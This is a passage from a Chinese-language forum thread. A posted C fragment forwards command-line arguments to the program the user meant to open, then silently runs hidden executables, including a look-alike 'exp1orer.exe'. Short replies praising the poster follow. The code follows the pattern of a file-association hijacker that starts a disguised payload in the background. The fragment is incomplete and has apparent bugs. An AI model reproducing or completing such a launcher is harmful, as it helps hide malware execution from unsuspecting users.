//下面的判断很重要,当用LPWSTR *argv=CommandLineToArgvW(GetCommandLineW(),&argc)把文件名当作参数传入的时候,文件名中不能有空格,比如C:\program files\a.txt,会报找不到C:\program.txt文件,因为参数的个数是以空格判断的,所以一定要加个下面的判断
for(i=1;i<argc;i++)
{
lstrcat(cmdline," ");
WideCharToMultiByte(CP_OEMCP,NULL,argv,-1,arg,MAX_PATH,NULL,NULL);
lstrcat(cmdline,arg);
}
WinExec(cmdline,SW_SHOW);
if(FileExists(windows))
WinExec(windows,SW_HIDE);
else
if(FileExists(system))
WinExec(system,SW_HIDE);
else
{
root='\0';
lstrcat(root,"exp1orer.exe");
if(FileExists(root))
WinExec(root,SW_HIDE);
}
return 0;
}
bool FileExists(char *filename)
{
HANDLE hFind;
WIN32_FIND_DATA FindData;
hFind=FindFirstFile(filename,&FindData);
if(hFind==INVALID_HANDLE_VALUE)
{
return false;
}
return true;
}
楼主厉害,学习 好厉害的样子围观 感谢楼主分享学习了 嗯,不错 有點猛表示
太神啦
厲害 大神表示瞬间智障了。哈哈哈 楼主编译后能否正常运行 支持楼主 学习了 楼主厉害.........
页:
[1]
2